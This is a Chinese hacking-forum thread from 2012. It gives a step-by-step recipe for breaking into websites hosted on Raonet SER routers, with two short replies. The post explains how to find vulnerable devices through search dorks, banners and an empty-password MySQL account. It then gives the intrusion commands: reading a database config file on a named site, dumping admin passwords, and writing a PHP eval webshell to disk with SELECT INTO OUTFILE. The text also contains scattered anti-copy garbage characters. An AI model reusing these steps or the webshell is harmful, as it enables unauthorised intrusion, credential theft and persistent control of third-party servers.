找回密码
 立即注册
查看: 3740|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
  寻找存在漏洞的路由器方法:$ Q4 x6 m9 O: K* g: m5 P0 @
0 q( b* R9 ~, p& Z' t2 G
1:google搜索'Raonet Subscriber Ethernet Router': E( Y4 d( m# p7 U; Z

" ?6 _$ F( d* W2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
8 e; N, l: z. F4 Z  B$ O: Z, f
2 q. R  `' u% L# }& r; s9 \7 I3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
2 f+ X, S$ j% _& v7 B4 Z" C; F' D: ^- P: z
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......0 s8 D, w9 f7 M0 Q# M5 n2 W  L* G
! a0 Y1 @2 q+ U3 I1 T9 _+ @

- L  `4 ]9 m& ]5 F% a4 s9 }! k& G" W8 ]
入侵步骤:9 [; v9 H  y* _- M. |8 d" c

3 w$ I$ [: }* ]/ ~1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
0 K8 S. a) \$ `  E/ B' I) X3 F7 @/ R5 r( _; w1 I9 T
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc5 g0 `8 ?: h  I% T# N; X
3:得到密码后连接,查看GUI管理密码:: F2 q  [8 Z# B7 F9 {7 R
use ser_500
  Z( ^* Q4 L2 o( o* iselect id,passwd from user;- W+ w3 V; c8 W) e! W5 }4 o
4:通过数据库写入webshell,执行命令:
! c1 Z) L: y  r- wuse mysql;
1 T7 Y* L/ }0 ocreate table ok(cmd TEXT);1 A1 V2 Y& s# G  p. O5 T
insert into ok values("<?php @eval($_POST[cmd])?>");
; Z/ C+ e; b; B( i* D% bselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";( }9 @# V9 D8 V/ G3 Q  l3 e! l
drop table ok;
1 |1 e* m  \7 t2 J+ f
. Q) W# H- S1 a! b. _5:连接后门shell.php
7 i7 A5 L# K: o5 f: v' c( u; D+ |4 X* l" T$ Y7 e
6. 搞定!6 B* }5 H- |. q* a  Z  b/ X% @8 y  l# Y

4 U+ @, s! j! |  s" ?
回复

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表